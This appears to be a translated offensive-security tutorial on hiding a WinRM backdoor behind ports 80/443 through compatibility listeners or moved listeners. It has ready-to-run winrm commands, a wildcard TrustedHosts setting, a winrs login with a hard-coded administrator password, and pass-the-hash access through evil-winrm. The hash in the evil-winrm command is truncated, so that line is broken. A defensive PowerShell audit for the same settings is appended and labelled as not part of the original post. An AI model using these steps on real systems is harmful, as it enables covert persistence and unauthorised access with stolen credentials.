
WinRM implements port multiplexing

This technique requires an account and password. If you obtain the account's NTLM hash instead, you can also log in with evil-winrm using pass-the-hash.

Service Introduction

WinRM stands for Windows Remote Management. It is Microsoft's implementation of the WS-Management protocol and can be used to manage local or remote servers. The WinRM service lets administrators log in to a Windows system remotely and obtain an interactive command-line shell similar to Telnet, with HTTP (or HTTPS) as the underlying transport.

Backdoor Application

On Windows Server 2012, WinRM is started by default and listens on port 5985; on Windows Server 2008 the service must be enabled manually:

winrm quickconfig -q

After the service starts, the firewall rule for the WinRM port is opened as well.

Enable the compatibility listeners so that WinRM also listens on ports 80/443 alongside the existing listener:

HTTP compatibility listener (port 80):
winrm set winrm/config/service @{EnableCompatibilityHttpListener='true'}

HTTPS compatibility listener (port 443):
winrm set winrm/config/service @{EnableCompatibilityHttpsListener='true'}

Alternatively, change the ports of the existing listeners to 80/443:

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port='80'}

winrm set winrm/config/Listener?Address=*+Transport=HTTPS @{Port='443'}

To connect from a client machine, the WinRM service must be enabled there too, and the target must be added as a trusted host:

winrm quickconfig -q

winrm set winrm/config/Client @{TrustedHosts='*'}

winrs -r:http://172.16.142.151:5985 -u:administrator -p:admin123 'whoami'

WinRM PTH

Pass-the-hash with evil-winrm on macOS:

sudo gem install evil-winrm

evil-winrm -i 172.16.142.151 -u administrator -H 8842
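A defender-side audit of the configuration changes described in this post, added here as an example and not part of the original post. It reads the built-in WSMan: PowerShell drive and assumes an elevated PowerShell session on the host being checked, with the WinRM service running (otherwise the drive is unavailable).

```powershell
# Added audit script (not from the original post): flag the three changes described above,
# i.e. compatibility listeners enabled, listeners moved off the default WinRM ports,
# and a wildcard TrustedHosts client setting.
$defaultPorts = @{ 'HTTP' = 5985; 'HTTPS' = 5986 }
$findings = @()

# Compatibility listeners make WinRM answer on 80/443 alongside IIS or other web services.
foreach ($name in 'EnableCompatibilityHttpListener', 'EnableCompatibilityHttpsListener') {
    $value = (Get-Item "WSMan:\localhost\Service\$name").Value
    if ($value -eq 'true') {
        $findings += "Service/$name is enabled (WinRM also answers on 80/443)"
    }
}

# Each listener is a container under WSMan:\localhost\Listener whose leaves hold
# Address, Transport, Port, Enabled and so on.
foreach ($listener in Get-ChildItem WSMan:\localhost\Listener) {
    $props = @{}
    foreach ($leaf in Get-ChildItem $listener.PSPath) { $props[$leaf.Name] = $leaf.Value }
    $transport = $props['Transport']
    $port = [int]$props['Port']
    if ($defaultPorts.ContainsKey($transport) -and $defaultPorts[$transport] -ne $port) {
        $findings += "Listener $($listener.Name): $transport on non-default port $port"
    }
}

# TrustedHosts='*' lets this host's WinRM client authenticate to any remote machine.
$trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
if ($trusted -eq '*') {
    $findings += "Client/TrustedHosts is set to '*'"
}

if ($findings.Count -eq 0) {
    Write-Output 'WinRM configuration matches defaults.'
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}
```

The same listener data is available without the WSMan: drive via winrm enumerate winrm/config/listener, which is useful when collecting the output through a remote management tool.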
